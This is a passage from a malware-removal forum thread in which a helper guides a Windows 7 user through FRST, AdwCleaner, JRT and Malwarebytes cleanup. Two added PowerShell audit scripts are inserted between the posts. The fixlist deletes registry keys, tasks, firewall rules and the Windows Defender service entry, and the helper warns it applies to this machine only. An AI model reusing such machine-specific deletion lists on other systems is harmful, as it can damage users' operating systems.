  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2011-02-27 19:01:15.791
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\KEKLR\AppData\Local\Temp\OnlineScanner\Anti-Virus\fsgk.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2011-02-27 19:01:15.775
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\KEKLR\AppData\Local\Temp\OnlineScanner\Anti-Virus\fsgk.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel® Core™2 Duo CPU T6600 @ 2.20GHz
Percentage of memory in use: 72%
Total physical RAM: 3999.19 MB
Available physical RAM: 1112.07 MB
Total Virtual: 7996.56 MB
Available Virtual: 4961.82 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:285.17 GB) (Free:196.29 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:12.72 GB) (Free:2.12 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 2169E425)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=285.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=12.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
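The CodeIntegrity entries in the Addition.txt log above are Windows' own record of kernel drivers it could not verify (here ComboFix's catchme.sys and an online scanner's fsgk.sys, both from clean-up tools run years earlier). As an added example that is not part of this thread or of FRST, the Windows PowerShell script below reads those events straight from the event log and lists every running driver whose embedded Authenticode signature does not verify. It assumes an elevated Windows PowerShell prompt (2.0 or later, so it runs on Windows 7) and that the Microsoft-Windows-CodeIntegrity/Operational log is enabled, which is the default; nothing in it is specific to this machine.

```powershell
# Added example (not from the thread or from FRST): read the CodeIntegrity events that
# FRST summarises, and list running kernel drivers whose embedded signature does not
# verify. Assumptions: elevated Windows PowerShell 2.0+ and the default-enabled
# Microsoft-Windows-CodeIntegrity/Operational log. Nothing is specific to this machine.

function Get-CodeIntegrityEvents {
    # 3004 is the "unable to verify the image integrity ... file hash could not be
    # found" event quoted in the FRST log; 3001 is "unsigned kernel module loaded".
    param([int]$Days = 3650)
    $filter = @{
        LogName   = 'Microsoft-Windows-CodeIntegrity/Operational'
        Id        = @(3001, 3004)
        StartTime = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # The message names the file as an NT device path, e.g. \Device\HarddiskVolume2\...
        $file = ''
        if ($_.Message -match '(\\Device\\\S+)') { $file = $Matches[1] }
        New-Object PSObject -Property @{ Time = $_.TimeCreated; Id = $_.Id; File = $file }
    }
}

function Get-UnverifiedRunningDrivers {
    # Win32_SystemDriver gives the on-disk path of every loaded driver. PathName may be
    # written as \??\C:\... or \SystemRoot\..., so normalise it before checking the file.
    Get-WmiObject -Class Win32_SystemDriver |
        Where-Object { $_.State -eq 'Running' -and $_.PathName } |
        ForEach-Object {
            $file = $_.PathName -replace '^\\\?\?\\', '' -replace '^\\SystemRoot', $env:SystemRoot
            $file = [Environment]::ExpandEnvironmentVariables($file)
            if (-not (Test-Path -LiteralPath $file)) { return }
            $sig = Get-AuthenticodeSignature -FilePath $file
            if ($sig.Status -eq 'Valid') { return }
            $signer = ''
            if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
            New-Object PSObject -Property @{
                Name = $_.Name; Path = $file; Status = $sig.Status; Signer = $signer
            }
        }
}

'== CodeIntegrity events 3001/3004 =='
Get-CodeIntegrityEvents | Sort-Object Time | Format-Table Time, Id, File -AutoSize
'== Running drivers without a verifiable embedded signature =='
Get-UnverifiedRunningDrivers | Format-Table Name, Status, Path -AutoSize
```

Two caveats when reading the output. On Windows 7, Get-AuthenticodeSignature does not consult the driver catalogs, so many Microsoft inbox drivers under System32\drivers report NotSigned; what matters is a driver loaded from an unusual location (a Temp directory, a user profile, a tool folder such as the ComboFix path in the log) or one with a signer you do not recognise. Get-WmiObject exists only in Windows PowerShell; on PowerShell 7 replace it with Get-CimInstance.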



#28 Android 8888

    SWI Malware Tracker

  • Helper
  • 865 posts

Posted 11 April 2017 - 06:44 PM

Hello krtate.

The Malwarebytes Anti-Rootkit log is clean so it appears the rootkit is gone.

Please proceed with the instructions below.


Perform the following fix with FRST.

NOTICE: This script was written specifically for this user, for use on this particular machine. Running this on another machine may cause damage to your operating system.

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK button.
Please copy the entire contents of the code box below. To do this highlight the contents of the box and right click on it and select Copy.
Paste this into the open Notepad.

Start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-18\...A8F59079A8D5}\localserver32: <==== ATTENTION
SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
BHO-x32: hpBHO Class -> {ABD3B5E1-B268-407B-A150-2641DAB8D898} -> C:\Program Files (x86)\Common Files\Homepage Protection\HomepageProtection.dll [2009-06-08] (AOL Products)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\AtStart.txt
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\DSwitch.txt
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\QSwitch.txt
2017-04-09 18:57 - 2017-02-09 12:33 - 1732864 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\dllnt_dump.dll
Task: {145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} - System32\Tasks\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -d C:\Windows\SysWOW64 -c /AppMode=DOWNLOADMANAGER /SummerUpdate /PackageType=Free /ProductType=Free
Task: {7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} - System32\Tasks\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsInstall&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:notoffered;alreadyoffered
Task: {8529AC47-189E-4DDF-B06C-D355E6130614} - System32\Tasks\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsPlugin&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:offered-installed;madedefault
FirewallRules: [{93464EED-A641-4CB5-8DC6-92BFDF7A1E14}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
FirewallRules: [{DC01FAA2-E761-4009-AD0C-43E643AD9B75}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
CMD: ipconfig /flushdns
EmptyTemp:
Hosts:
End


Save the file as fixlist.txt into the same folder where FRST64 is placed, which is the computer's Desktop.
Now, right-click the FRST64 icon and select Run as administrator to start the tool.
Click the Fix button only once and wait.
When finished FRST will generate a log on the Desktop named fixlog.txt. Please post its entire content in your next reply.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.



Next,

Please download AdwCleaner by Xplode and save it to your Desktop.

  • Close all open programs and internet browsers.
  • Right-click on the icon and select Run as administrator to start the tool.
  • Click Yes to accept any security warnings that may appear.
  • Click I Agree on the disclaimer to accept the Terms of Use.
  • Click the Scan button to start the scan and wait for the process to complete.
  • Click the Logfile button and the report will open in Notepad.
  • NOTE: If you get an error message, it means that nothing was found. Exit from AdwCleaner.
  • Click on the Clean button and follow the prompts.
  • A log file will automatically open after the scan has finished and the PC has rebooted.
  • Please post the content of that log file in your next reply.
  • You can find the log file at C:\AdwCleaner[Cn].txt (n is a number, the highest number is the most recent).


Next,

Please download Junkware Removal Tool and save it to your Desktop.

  • Please close your security software to avoid potential conflicts.
  • Right-click on the icon and select Run as administrator to start the tool.
  • The tool will open and check for updates. You will see the Disclaimer.
  • Press any key to continue and start scanning your system.
  • Please be patient as this can take a while to complete, depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.

Please post the contents of JRT.txt into your next reply.



Next,

The Malwarebytes version that you have installed is outdated.

Please read the instructions below and make a clean install of Malwarebytes from version 2 to version 3.

Download MBAM-clean and save it to your computer Desktop.
Right-click on mbam-clean.exe icon and select Run as administrator to start the tool.
It will ask you to reboot the machine - please do so.
Run the MBAM-clean tool again and reboot when complete. << NOTE: DO NOT miss this step.

If you have lost the activation licence key information it can be located here

Download Malwarebytes version 3 from here and save it to your Desktop, or anywhere else on your system as long as you know where it is located.

Double click on the installer and follow the prompts to install the program. If necessary select the blue Help tab for video instructions.

When the install completes and is updated do the following:

  • Start Malwarebytes;
  • On the left pane select Settings;
  • Then select the Protection tab;
  • Scroll down to Scan Options and ensure Scan for Rootkits and Scan within archives are both on.
  • Go back to DashBoard and select the blue Scan Now tab.
  • When the scan completes deal with any found entries.
  • Select Export Summary and then Text File (*.txt). Give a name to the log and save it;
  • Please copy and paste the entire content of that log in your next reply.

In your next reply please post the contents of the following logs:
fixlog.txt produced by FRST;
AdwCleaner clean log;
JRT.txt log;
Malwarebytes log.

Let me know how your computer is running at this point. Do you still have issues with changing the Home Page in Internet Explorer?

Thank you.

Android 8888


Android 8888

Website: http://android8888.comlu.com

Tavira - Here's where I live!

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"

Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.
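The fixlist in the post above rewrites several kinds of persistence point: the Internet Explorer SearchScopes (a search hijack), a Browser Helper Object, three scheduled tasks, two firewall Allow rules for a leftover AVG 10 binary that the fix also removes, the hosts file, plus the Windows Defender service entry and a few stray files. As an added example, not code from this thread or from FRST, the Windows PowerShell script below audits those same locations read-only, so you can see what a fix will touch before running it and confirm afterwards that the entries are gone. It assumes an elevated Windows PowerShell prompt (2.0 or later, so it works on Windows 7), an English Windows (the schtasks CSV column names are localised) and the standard registry locations; nothing in it is specific to this machine.

```powershell
# Added example (not from the thread or from FRST): read-only audit of the persistence
# points the FRST fixlist rewrites. Nothing here modifies the system.
# Assumptions: elevated Windows PowerShell 2.0+, English Windows (schtasks column names),
# standard registry locations. Nothing is specific to the machine in the thread.

function Get-IESearchScopes {
    # Search providers in the 64-bit and 32-bit (Wow6432Node) views. A search hijack
    # usually sets DefaultScope to a GUID whose URL points at a third-party site.
    $roots = @(
        'HKLM:\SOFTWARE\Microsoft\Internet Explorer\SearchScopes',
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes'
    )
    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }
        $default = (Get-ItemProperty -Path $root).DefaultScope
        foreach ($scope in Get-ChildItem -Path $root) {
            $url = (Get-ItemProperty -Path $scope.PSPath).URL
            New-Object PSObject -Property @{
                View = $root; Scope = $scope.PSChildName
                Default = ($scope.PSChildName -eq $default); URL = $url
            }
        }
    }
}

function Get-BrowserHelperObjects {
    # BHOs load into every Internet Explorer process; resolve each CLSID to its DLL.
    $roots = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects',
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects'
    )
    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }
        foreach ($bho in Get-ChildItem -Path $root) {
            $clsid = $bho.PSChildName
            $dll = $null
            $classKeys = @(
                "HKLM:\SOFTWARE\Classes\CLSID\$clsid\InprocServer32",
                "HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID\$clsid\InprocServer32"
            )
            foreach ($k in $classKeys) {
                if (Test-Path $k) { $dll = (Get-ItemProperty -Path $k).'(default)'; break }
            }
            $exists = $false
            if ($dll) { $exists = Test-Path -LiteralPath ([Environment]::ExpandEnvironmentVariables($dll)) }
            New-Object PSObject -Property @{ CLSID = $clsid; DLL = $dll; OnDisk = $exists }
        }
    }
}

function Get-SuspiciousTasks {
    # Windows 7 has no Get-ScheduledTask, so parse schtasks' verbose CSV. schtasks
    # repeats its header line once per task folder; drop those rows before filtering.
    $tasks = schtasks /query /fo CSV /v | ConvertFrom-Csv | Where-Object { $_.TaskName -ne 'TaskName' }
    # Flag tasks that open a browser on a URL, launch through pcalua.exe (the Program
    # Compatibility Assistant, usable as a proxy launcher) or run from a Temp directory.
    $tasks | Where-Object { $_.'Task To Run' -match 'iexplore\.exe|pcalua\.exe|\\Temp\\|https?://' } |
        Select-Object TaskName, 'Task To Run'
}

function Get-StaleAllowRules {
    # Each FirewallRules value looks like
    #   v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|App=C:\path\prog.exe|Name=...|
    # An Allow rule whose App is gone lies dormant until something drops a new binary
    # at that path, which is why the fix removes the AVG10 rules along with the file.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules'
    $rules = Get-ItemProperty -Path $key
    foreach ($name in ($rules | Get-Member -MemberType NoteProperty | ForEach-Object { $_.Name })) {
        $value = "$($rules.$name)"
        if ($value -notmatch 'Action=Allow') { continue }
        if ($value -match 'App=([^|]+)') {
            $app = [Environment]::ExpandEnvironmentVariables($Matches[1])
            if (-not (Test-Path -LiteralPath $app)) {
                New-Object PSObject -Property @{ Rule = $name; App = $app }
            }
        }
    }
}

function Get-ActiveHostsEntries {
    # A stock Windows 7 hosts file is comments only; any live line deserves a look.
    $hosts = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'
    Get-Content -Path $hosts | Where-Object { $_ -match '\S' -and $_ -notmatch '^\s*#' }
}

'== IE search scopes =='
Get-IESearchScopes | Format-Table Scope, Default, URL -AutoSize
'== Browser Helper Objects =='
Get-BrowserHelperObjects | Format-Table CLSID, OnDisk, DLL -AutoSize
'== Scheduled tasks launching a browser, pcalua.exe or a Temp path =='
Get-SuspiciousTasks | Format-Table -AutoSize
'== Allow rules whose program no longer exists =='
Get-StaleAllowRules | Format-Table Rule, App -AutoSize
'== Active hosts entries =='
Get-ActiveHostsEntries
```

Run it once before the fix and keep the output; after the fix, the two SearchScopes entries, the hpBHO CLSID, the three GUID-named tasks and any active hosts lines should be gone, and the Allow-rule check should come back empty because the rules were removed together with avgmfapx.exe. The registry-backed checks are the same data FRST reads; the script only reports, it never deletes.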


#29 krtate

    Advanced Member

  • Full Member
  • 170 posts

Posted 11 April 2017 - 07:34 PM

Does it matter that my computer restarted and downloaded updates before I do all the steps above?



#30 krtate

    Advanced Member

  • Full Member
  • 170 posts

Posted 11 April 2017 - 08:36 PM

Fix result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by KEKLR (11-04-2017 21:27:06) Run:2
Running from C:\Users\KEKLR\Desktop
Loaded Profiles: KEKLR (Available Profiles: KEKLR)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
 CreateRestorePoint:
 CloseProcesses:
 HKU\S-1-5-18\...A8F59079A8D5}\localserver32: <==== ATTENTION
 SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
 SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
 SearchScopes: HKLM-x32 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
 SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
 BHO-x32: hpBHO Class -> {ABD3B5E1-B268-407B-A150-2641DAB8D898} -> C:\Program Files (x86)\Common Files\Homepage Protection\HomepageProtection.dll [2009-06-08] (AOL Products)
 S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
 2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\AtStart.txt
 2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\DSwitch.txt
 2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\QSwitch.txt
 2017-04-09 18:57 - 2017-02-09 12:33 - 1732864 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\dllnt_dump.dll
 Task: {145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} - System32\Tasks\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -d C:\Windows\SysWOW64 -c /AppMode=DOWNLOADMANAGER /SummerUpdate /PackageType=Free /ProductType=Free
 Task: {7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} - System32\Tasks\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsInstall&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:notoffered;alreadyoffered
 Task: {8529AC47-189E-4DDF-B06C-D355E6130614} - System32\Tasks\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsPlugin&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:offered-installed;madedefault
 FirewallRules: [{93464EED-A641-4CB5-8DC6-92BFDF7A1E14}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
 FirewallRules: [{DC01FAA2-E761-4009-AD0C-43E643AD9B75}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
 C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
 CMD: ipconfig /flushdns
 EmptyTemp:
 Hosts:
 End
*****************

Restore point was successfully created.
Processes closed successfully.
HKU\S-1-5-18\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 => key not found.
HKU\S-1-5-18\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key removed successfully
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key removed successfully
HKCR\Wow6432Node\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ABD3B5E1-B268-407B-A150-2641DAB8D898} => key removed successfully
HKCR\Wow6432Node\CLSID\{ABD3B5E1-B268-407B-A150-2641DAB8D898} => key not found.
HKLM\System\CurrentControlSet\Services\WinDefend => key removed successfully
WinDefend => service removed successfully
C:\Users\KEKLR\AppData\Local\AtStart.txt => moved successfully
C:\Users\KEKLR\AppData\Local\DSwitch.txt => moved successfully
C:\Users\KEKLR\AppData\Local\QSwitch.txt => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\dllnt_dump.dll => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} => key removed successfully
C:\Windows\System32\Tasks\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} => key removed successfully
C:\Windows\System32\Tasks\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8529AC47-189E-4DDF-B06C-D355E6130614} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8529AC47-189E-4DDF-B06C-D355E6130614} => key removed successfully
C:\Windows\System32\Tasks\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => key removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{93464EED-A641-4CB5-8DC6-92BFDF7A1E14} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{DC01FAA2-E761-4009-AD0C-43E643AD9B75} => value removed successfully
C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe => moved successfully

========= ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 7577015 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/drivers => 22437481 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 15916 B
KEKLR => 19494588 B

RecycleBin => 0 B
EmptyTemp: => 55.2 MB temporary data Removed.

================================

The system needed a reboot.

==== End of Fixlog 21:28:00 ====



#31 krtate

    Advanced Member

  • Full Member
  • 170 posts

Posted 11 April 2017 - 08:50 PM

# AdwCleaner v6.045 - Logfile created 11/04/2017 at 21:44:04
# Updated on 28/03/2017 by Malwarebytes
# Database : 2017-04-11.1 [Server]
# Operating System : Windows 7 Home Premium Service Pack 1 (X64)
# Username : KEKLR - KEKLR-PC
# Running from : C:\Users\KEKLR\Desktop\adwcleaner_6.045.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support


***** [ Services ] *****


***** [ Folders ] *****

[-] Folder deleted: C:\Users\KEKLR\AppData\LocalLow\HPAppData
[-] Folder deleted: C:\Program Files (x86)\Coupons

***** [ Files ] *****

[-] File deleted: C:\Users\Public\Desktop\eBay.lnk
[-] File deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eBay.lnk

***** [ DLL ] *****


***** [ WMI ] *****


***** [ Shortcuts ] *****


***** [ Scheduled Tasks ] *****


***** [ Registry ] *****

[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.Protector
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.Protector.1
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.ProtectorBho
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.ProtectorBho.1
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.Protector
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.Protector.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.ProtectorBho
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.ProtectorBho.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib.1
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{761F6A83-F007-49E4-8EAC-CDB6808EF06F}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{76C45B18-A29E-43EA-AAF8-AF55C2E1AE17}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{7CD74AFF-3433-4E34-92E2-D98DFDB30754}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{96EF404C-24C7-43D0-9096-4CCC8BB7CCAC}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{97720195-206A-42AE-8E65-260B9BA5589F}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{97D69524-BB57-4185-9C7F-5F05593B771A}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{986F7A5A-9676-47E1-8642-F41F8C3FCF82}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{B18788A4-92BD-440E-A4D1-380C36531119}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKU\.DEFAULT\Software\Auslogics
[-] Key deleted: HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\YahooPartnerToolbar
[-] Key deleted: HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Auslogics
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3698744866-2675293530-421701469-1001\Software\AVG Security Toolbar
[#] Key deleted on reboot: HKU\S-1-5-18\Software\Auslogics
[#] Key deleted on reboot: HKCU\Software\YahooPartnerToolbar
[#] Key deleted on reboot: HKCU\Software\Auslogics
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3698744866-2675293530-421701469-1001\Software\AVG Security Toolbar
[#] Key deleted on reboot: [x64] HKCU\Software\YahooPartnerToolbar
[#] Key deleted on reboot: [x64] HKCU\Software\Auslogics

***** [ Web browsers ] *****

[-] [C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com

*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [3792 Bytes] - [11/04/2017 21:44:04]
C:\AdwCleaner\AdwCleaner[S0].txt - [3763 Bytes] - [11/04/2017 21:41:01]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [3938 Bytes] ##########



#32 krtate

    Advanced Member

  • Full Member
  • 170 posts

Posted 11 April 2017 - 09:04 PM

Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.3 (04.10.2017)
Operating System: Windows 7 Home Premium x64
Ran by KEKLR (Administrator) on Tue 04/11/2017 at 21:53:16.40
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


File System: 15

Successfully deleted: C:\Users\KEKLR\AppData\Local\{1C6B0370-E376-4EFE-B002-30C4ABD7D16C} (Empty Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\{38EAE2D8-58EA-4A27-BDE4-838EB929F2E8} (Empty Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\{6AC0772D-B6C5-434A-B3F6-A1E7372D11C8} (Empty Folder)
